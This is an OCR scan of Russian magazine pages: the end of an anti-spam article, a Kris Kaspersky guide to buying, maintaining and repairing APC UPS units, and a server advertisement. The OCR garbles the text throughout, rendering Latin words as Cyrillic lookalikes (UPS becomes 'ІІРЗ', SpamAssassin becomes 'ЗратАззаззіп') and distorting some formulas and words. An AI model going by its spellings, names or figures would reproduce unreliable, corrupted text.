ЗратАззаззіп и ряда антивирусных пакетов, 
способен выполнять кое-какую фильтрацию и 
самостоятельно (например, по расширениям 
вложений) . Высокая гибкость и настраива- 
емость делают ЗратАззаззіп стандартом де- 
факто в борьбе со спамом. Однако платить за 
это приходится огромными вычислительны- 
ми затратами (Регі, все-таки) и повышенным 
вниманием к настройкам и обучению. 

Заключение 

Как видишь, средств борьбы со спамом — ве- 
ликое множество. Некоторые из них довольно 
хороши. Другие способны превратиться в 
проблему, гораздо большую, чем сам спам. Но в 
любом случае ситуация не безнадежна. Другой 
вопрос, что результат будет напрямую зависеть 
от прилагаемых усилий. Легко и быстро изба- 
виться от спама в ближайшем будущем вряд ли 
удастся. ПС 
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КРИС КАСПЕРСКИ 



Секреты 



о 






бесперебойной 

РАБОТЫ 



РЕМОНТ И ОБСЛУЖИВАНИЕ АРС УР5 р ИЛИ ПО ТУ СТОРОНУ ЛЕГЕНДАРНОЙ НАДЕЖНОСТИ 



Имея многолетний опыт работы с различными моделями ИР5 фирмы Атегісап Роѵѵег Сопѵегзіоп, эксплу- 
атируемыми в жестких условиях сельских энергосетей, мыщъх делится советами, которых ты не найдешь 
ни в техническом руководстве, ни в какой другой книге. Ты узнаешь, как продлить жизнь ІІР5 или даже 
воскресить агрегат, не являясь при этом электронщиком и не имея под рукой никакой измерительной 
аппаратуры, кроме китайского мультиметра. 



Покупка II Р5 

Нужен ли мне ІІР5 или нет? 

Этот вопрос не так прост, как кажется. ІІРЗ не 
только является статьей расходов, но также 
может служить источником дополнительных 
сбоев и проблем, особенно если он принадле- 
жит к дешевой Васк-ІІр серии, работающей на 
пределе мощности. Импульсные блоки питания 
компьютеров довольно лояльно относятся 
к длительному отклонению питающего на- 
пряжения, выдерживая падения до 20-30% от 
номинала без особых осложнений. А вот Васк- 
ІІРЗ в этом случае автоматически переходит на 
батареи и. . . когда они разряжаются компьютер 
приходится включать напрямую в обход ІІРЗ. 
Серия ЗтаП поддерживает специальный режим 
ВоозГ , переключающий обмотки автотрансфор- 
матора и сохраняющий работоспособность там, 
где Васк-ІІРЗ уже не справляется, однако если в 
электросети происходят частые провалы напря- 
жения, вызванные, например, сварочными ап- 
паратами, то и Васк, и ЗтагМІРЗ переходят на 
батареи при каждом таком провале, оживленно 
клацая реле. Это приводит к преждевременно- 
му выходу реле из строя (обгоранию контак- 
тов) и, как следствие, выбиванию нагрузки, к 
быстрому разряду батарей, к дополнительным 
помехам и броскам выходного напряжения в 
моменты перехода с сети на батареи и обратно. 
Однако сварочные аппараты возвращают в сеть 
большую реактивную составляющую вместе 
с высокочастотными помехами, от которых 



СКТ-мониторы летят как семечки и установка 
ЗтагМІРЗ становится экономически оправ- 
данной. Еще хуже, если на линии присутствуют 
мощные тиристорные установки (применяе- 
мые, в частности, на газопроводах), создающие 
импульсные и высокочастотные помехи вместе с 
провалами. Здесь без ЗііагЫІРЗ уже не обойтись, 
однако, срок ее службы будет весьма недолгим, а 
вероятность "выбивания" нагрузки по причине 
глюка ІІРЗ окажется существенно отличной от 
нуля. 

Офисный компьютер с ЬСЭ монитором в усло- 
виях плохого электропитания значительно луч- 
ше чувствует себя _без_ ІІРЗ . Как показывает 
практика, ІІРЗ только увеличивает количество 
сбоев и перезагрузок. При качественном пита- 
нии ІІРЗ становится практически бесполезным 
агрегатом, о котором забывают сразу же после 
покупки, и когда напряжение исчезает, сдох- 
шие за это время батареи вырубают компьютер 
сразу, так что ІІРЗ даже не успевает мяукнуть. 
Вывод: если и покупать ІІРЗ, то только модель 
из серии Зтагі: с достаточным запасам по 
мощности, поскольку, чем больше мощность, 
тем больше "щелков" способны выдержать реле, 
плюс емкие батареи позволяют свободно рабо- 
тать в "щелкающем" режиме, не поглядывая на 
оставшейся уровень заряда. 

Как рассчитать 
неоБходимую мощность ІІРЗ? 

Полная мощность рассчитывается по простой 



формуле: 3[ѴА] = II [вольт] *І [ампер] и выража- 
ется в вольт-амперах. Именно этот параметр 
красуется на морде ІІРЗ . А вот производители 
компьютеров и мониторов указывают на корпу- 
се активную мощность, выражаемую в ваттах 
и в цепях с реактивной нагрузкой, рассчитыва- 
емой по формуле: Р[ватт] =11 [вольт] *І [ампер] 
*соз (ф), где ф — угол сдвига фазы. Поскольку 
косинус всегда меньше единицы, полная мощ- 
ность всегда больше активной. То есть если на 
задней стенке монитора написано 400 ватт, то 
вовсе не факт, что для его питания подойдет 400 
ѴАІІРЗ, поскольку значение ф производитель 
обычно скрывает, но для СКТ-мониторов соз(ф) 
составляет порядка 0, 7, а для ІХЮ — приближа- 
ется к единице. 

Мощность в цепях с импульсной нагруз- 
кой рассчитывается по формуле: Р[Ватт] = 

II [Вольт] *І [Ампер] *К, где К - коэффициент 
мощности, варьирующейся от типа питаемо- 
го оборудования и для импульсных блоков 
питания (по данным АРС) составляющий 
порядка 0.6-0. 8, из чего следует, что при пот- 
ребляемой мощности в 400 Ватт, нам понадо- 
биться по меньшей мере 800 ѴА ІІРЗ (3 = = Р/К 
= =400/0.6 ~ 800). 

Но это минимально (!) допустимая мощность, 
на которой ІІРЗ долго не проработает даже на 
линиях с качественным электропитанием и 
полученные цифры рекомендуется умножить 
как минимум на 1 . 5х, а лучше даже на 2, тем 
более что на более мощные ІІРЗ, как правило, 
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устанавливаются более мощные батареи, 
продлевающие время работы компьютера при 
частых провалах напряжения или полном его 
отсутствии. 

Эксплуатация ІІР5 

Как правильно подключать ІІРЗ? 

Большинство моделей АРС ІІРЗ чувствительно 
к правильности включения и прежде чем вты- 
кать вилку в розетку следует воспользоваться 
отверткой-пробником для определения где 
фаза, а где земля. В противном случае ІІРЗ 
может работать нестабильно, неожиданно вы- 
бивая нагрузку, создавая наводящие помехи 
(мешающие работать телефону, подклю- 
ченному через модем) ит.д. Правильность 
выбора фазы становится особенно важна если 
к компьютеру подключено оборудование, за- 
писанное напрямую от сети или от других ІІРЗ 
(лазерные принтеры, локальная сеть и т.д.); 

Сколько времени ІІРЗ 

может продержаться на Батареях? 

Время работы на батареях зависит не только 
от их фактической емкости (зачастую отлича- 
ющейся от указанной на корпусе в результате 
старения) , начального уровня заряда и потреб- 
ляемой мощности, но так и от токов утечек, в 
которые уходят электронные ключи ІІРЗ по мере 
деградации кристаллов, вызванной повышен- 
ной температурой и другими неблагоприятны- 
ми факторами. 

Точное значение можно определить только 
экспериментально, но для приблизительной 
ориентировки ниже приводятся таблица для 
модели ІІРЗ АРС 1000ХБ. 

Каков средний срок службы Батарей? 

По этому поводу существуют различные 
мнения, некоторые даже утверждают, что все 
продаваемые в России батареи — это вос- 
становленные китайские поделки. Согласно 
личному опыту мыщъх'а, родные батареи ІІРЗ 
работают до 5 лет и более (правда, к концу 
службы их емкость и время автономной работы 
падают в несколько раз), батареи, приобретен- 
ные в магазинах и сервисных центрах, тянут 
максимум 2-3 года. Но здесь все зависит от 
условий эксплуатации. 

Как продлить живнь Батареям и ІІРЗ? 

Вентиляторы устанавливаются только на неко- 
торых моделях АРС ІІРЗ, остальным же прихо- 
дится довольствоваться пассивным охлаждени- 
ем, в результате чего внутренности ІІРЗ даже в 
прохладное время года могут достигать весьма 
высоких температур. При температуре в +40 



градусов срок службы герметичных (зеаіесі 
или ѵаіѵе-ге^иіагесі) свинцово-кислотных 
батарей составляет всего 1,5-2 года, но уже 
при + 50 градусах батарея может выйти из 
строя буквально через несколько месяцев! 
Электронике тоже перегрев не идет на пользу и 
в первую очередь страдают силовые элемен- 
ты, уходящие в утечку, от которой "пухнут" 
электролитические конденсаторы или же вовсе 
заканчивая жизнь грандиозным пробоем. 
Настоятельно рекомендуется оснастить ІІРЗ 
системой принудительного охлаждения, закре- 
пив внутри корпуса кулер, наподобие тех, что 
используются в блоках питания или на худой 
конец применить обдув внешним офисным 
вентилятором, но только при этом надо сори- 
ентировать его так, чтобы перегретый воздух 
от силовых компонентов выносился наружу, а 
не продувал остальную часть платы с мелкой 
логикой. 

Теперь что касается самых батарей. Никогда 
не отключайте ІІРЗ надолго от сети, лишая ее 
возможности держать аккумуляторы на пос- 
тоянной подзарядке. Не допускайте глубоких 
разрядов батарей, оставляя по меньшей мере 
6% емкости, после чего следует отключайте 
ІІРЗ вплоть до восстановления питающего 
напряжения. С другой стороны, хотя бы раз в 
месяц, устраивайте "тренировку", разряжая 
батарею до ~ 10% и затем заряжая ее до полной 
емкости вновь. 

Как правильно менять Батареи? 

Покупаем двойной/тройной комплект бата- 
рей, устанавливаем один из них в ІІРЗ, делаем 
несколько циклов заряда/разряда, после чего 
заряжаем до полной вновь, даем поработать 
под нагрузкой несколько минут и меряем 
напряжение каждой из батарей вольтметром 
(естественно, не отключая нагрузки) . Бакте- 
рию с меньшим напряжением выбрасываем, 
после чего вставляем второй комплект и всю 
операцию повторяем вновь. В зависимости от 
качества поставщика и времени, проведенного 
батареями на складе, "полезный выход" колеб- 
лется от 30% до 50% — это батареи с нормаль- 
ной емкостью, с которыми можно работать. 

Все остальное — брак, который при удачном 
стечении обстоятельств удается возвратить 
продавцу, но чаще всего приходится включать 
в статью расходов, оплачиваемую из собствен- 
ного кармана. 

Тут многие могут возразить: мол, не слишком 
ли расточительная методика? ! А что делать . . . 
можно, конечно, замерять напряжение батареи 
прямо в магазине, используя в качестве нагруз- 
ки мощную лампу накаливая (от автомобиль- 
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> Штатная утилита РоѵѵегСЬиІе для настрой- 
ки и мониторинга ІІР5 



ной фары, например), но это намного менее 
надежно, поскольку мы не знаем состояние 
начального заряда. 

Как увеличить время равоты ІІРЗ от Батарей? 

Самое простое и дешевое решение — сменить 
СКТ-монитор на ІХЮ или установить в ІІРЗ 
дополнительный комплект батарей (об этом 
достаточно подробно написано в справоч- 
ном руководстве) . Однако если тебе важно 
действительно длительное время автономной 
работы, то выгоднее приобрести ІІРЗ с 17 А*ч 
аккумуляторами, чем волочить за собой целый 
хвост маломощных батарей. Также нелиш- 
не будет рассмотреть вопрос об установке 
дизельной электростанции, как в свое время и 
поступил мыщъх. 

Только не пытайся устанавливать в ІІРЗ 
батареи большей емкости — зарядная схема, 
не рассчитанная на такие издевательства, 
довольно быстро выйдет из строя. Лучше уста- 
новить дополнительные батареи, тем более что 
большинство моделей АРС ІІРЗ это позволяет. 

Стоит ли подключать к ІІРЗ 
«пилот» с гигдоргоііосіог? 

Если в обычных переносках типа «пилота» вся 
начинка состоит из простейшего разрядника, 
призванного реагировать на прямое попадание 
молнии в линию, то 5ііг§е ргоиесюг представляет 
собой довольно продвинутую защиту от скачков 
напряжения. Если ІІРЗ дает напряжение не 
чисто синусоидальной формы (как, например, 
это делает Васк-ІІРЗ, генерирующий серию 
прямоугольных импульсов), то зиг^е ргогесюг 
будет пытаться погасить избыточную скорость 
нарастания напряжения, в результате чего ра- 
бота оборудования, подключенного к фильтру, 
окажется невозможной. 

Можно ли выход одной ІІРЗ подавать на вход 
другой? 

Выход ЗтагМІРЗ можно подавать на что 
угодно, но смысла в этом немного, так как 
КПД очень сильно упадет и время работы 
в автономном режиме окажется намного 
меньше суммы автономной работы каждого из 
ІІРЗ по отдельности. Уж лучше часть оборудо- 
вания подключить к одному ІІРЗ, а часть — к 
другому. Выход Васк-ІІРЗ на вход другого ІІРЗ 
подключать нельзя, поскольку он очень сильно 
отличается от синусоиды. И тот, и другой ІІРЗ, 
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не выдержав таких искажений питающего напряжения, 
просто перейдет в автономный режим. 

Какое выходное напряжение лучше всего установить? 

Практически все модели АРС ІІРЗ позволяют изменять 
выходное напряжение при автономной работе, для настойки 
которого проще всего использовать штатную утилиту Рошег- 
ЗЬиГ. Считается, что чем меньше мы выберем напряжение, 
тем будет лучше как для компьютера, так и для самой ІІРЗ . А 
если посчитать? Потребляемая мощность одна и та же, а ток, 
проходящий через силовые элементы ІІРЗ и блока питания, 
равен: I [ампер] = = Р [Ватт] /V [вольт] , то есть, чем ниже 
напряжение, тем выше ток, а вместе с ним и выше нагруз- 
ка на все силовые элементы. Естественно, с повышением 
напряжения растет вероятность пробоя, но. . . ІІРЗ просто не 
позволит «задрать» выходное напряжение до тех границ, где 
эта вероятность становится весьма существенной. 

Но есть и другая сторона проблемы. Допустим, уровень 
напряжения электрической сети составляет 210 Вольт, а мы 
выставили в ІІРЗ - 260 Вольт. При невысоком качестве пита- 
ния и частых переходах на батареи с мгновенным возвратом 
обратно, выходное напряжение будет скакать в широких 
пределах, что навряд ли обрадует блок питания ПК, не говоря 
уже про скромные блоки питания внешних модемов и других 
внешних устройств. Так что выходное напряжение ІІРЗ 
должно быть близко к среднему напряжению в электричес- 
кой сети. 

Проблемы эксплуатации, или ремонт ІІР5 

ІІРЗ самопроизвольно вывивает нагрузку 

Прежде всего, не спеши валить все грехи на ІІРЗ — возмож- 
но, виноват блок питания ПК с подсохшими конденсато- 
рами. Подключи ІІРЗ ко входу заведомо исправного ПК и 
посмотри, прекратятся выбивания или нет. Кстати говоря, 
АРС ІІРЗ конфликтует с некоторыми моделями СКТ-мони- 
торов — отключи монитор и посмотри, что произойдет 
(правда, в результате падения нагрузки, выбивания 
могут прекратиться даже при нормальном мониторе) . 
Также замени батареи новыми и заведомо исправными. 
Очень часто ІІРЗ неверно определяет их емкость, но стоит 
только ему переключиться на них, как они внезапно сды- 
хают и нагрузка выбивается. Когда будешь делать это, убе- 
дись, что клеммы заходят плотно, а не болтаются кое-как. Во 
всяком случае, обжать их плоскогубцами не помешает. 
Следите также за температурой. В отсутствии активного 
охлаждения, ІІРЗ автоматически обесточивает нагрузку 
при перегреве. Также уменьшите чувствительность ІІРЗ 
к помехам, чтобы он реже переключался на батареи, 
уменьшая тем самым вероятность «глюков». Кстати, о 
глюках. Некоторые модели АРС ІІРЗ крайне болезненно 
реагируют на плавное падение питающего напряжения. 



Берем мощную «болгарку», включаем ее в розетку и 
вгрызаем в металл до полного заливания, сопровождаю- 
щегося плавным проседанием сетевого напряжения. ІІРЗ 
видитм, что напряжение ниже нормы и отдаемт команду 
реле включить ЗтаП-ВизГ для приведения его в норму 
(компьютер это время сидит на голодном пайке, питаясь 
только энергией, запасенной в электролитических кон- 
денсаторах), но напряжение продолжает падать и выходит 
за пределы возможностей ЗтагМЗизРа, тогда ІІРЗ отдает 
команду другому реле перейти на батареи и. . . вот тут-то 
терпение компьютера заканчивается и от вырубается, 
хотя с ІІРЗ ничего не случается. 

Если же выбивания происходят с удручающей регулярнос- 
тью — попробуйте заменить реле, емкие электролитичес- 
кие конденсаторы и силовые транзисторы на плате ІІРЗ, что 
можно сделать даже с минимальными навыками владения 
паяльником. На поел едок проверьте настройки Родл/егСІпЛе 
(если он установлен), поскольку по умолчанию ІІРЗ обес- 
точивает систему всего лишь через несколько минут после 
исчезновения питания, даже если энергии батарей хватило 
бы на многие часы. 

Батареи стали часто выходить ив строя 

Ключевые транзисторы схемы зарядки ушли в утечку из-за пе- 
регрева (а с ними, возможно) и некоторые другие элементы. 
Чтобы окончательно убедиться в этом, зарядите ІІРЗ до макси- 
мума и выдерните силовой шнур из сети, воткнут его на следу- 
ющее утро. Если аккумуляторы находятся в стадии глубокого 
разряда, ремонт ІІРЗ не рекомендуется откладывать в долгий 
ящик, хотя в целом она остается вполне работоспособной. 

Приравоте ІІРЗ периодически похрюкивает 

В одном из аккумуляторов кипит электролит, вырываясь 
через предохранительный клапан, издающий характерный 
хрюкающий звук и выпускающий на волю вместе с водяны- 
ми парами некоторое количество кислоты, оседающей на 
электронике и за короткое время приводящей ее в полную 
негодность. Возможные причины: либо неисправна схема 
зарядки, либо отказала одна из двух последовательно 
соединенных батарей, в результате чего вторая (еще ис- 
правная) хронически перезаряжается. Немедленно замени 
батареи и, если это не поможет, неси ІІРЗ в ремонт. 

Заключение 

Компания АРС производит действительно качественные 
и надежные источники бесперебойного питания, кото- 
рым мыщъх безоговорочно доверяет. И это доверие тем 
крепче, чем больше проблем у остальных пользователей, 
выбравших не АРС. Особенно «радуют» в этом отноше- 
нии ЗѴЕИ и другие фирмы, для которых ІІРЗ не является 
основной продукцией. Так что выводы делаем сами. ИНИ 
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Если Вам нужны мощные серверы, которые 
позволят делать больше работы и консолидировать 
вычислительные ресурсы, выбирайте серверы 
Эксилон Маіог НО на базе двухъядерных 
процессоров ІпІеІ®Хеоп®. 



Г арантия - 3 года 
Бесплатная доставка по Москве 
Вся продукция сертифицирована 
(РОСС ГСІІ.МЕ06.В04139) 



Заказ серверов: 



Подробная информация на сайте: ѵѵѵѵѵѵ.ехсііапсі.ги 
и по телефону: (495) 727-0231 



КОРПОРАТИВНЫЙ ОТДЕЛ: 

(495) 727-0231; е-таіі: Ь2Ь@ехсіІапсІ.ги 



е-таіІ:іпТо@ехсіІапсІ.ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іпТо@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іпТо@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таі 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, ІпіеІ, ІпіеІ Соге, ІпіеІ Іодо, Іпіеі Іпзісіе, ІпіеІ Іпзісіе Іодо, Іпіеі ЗреебЗіер, ІпіеІ Ѵііѵ, ІпіеІ Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, 
Репііит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на 
территории США и других стран. 




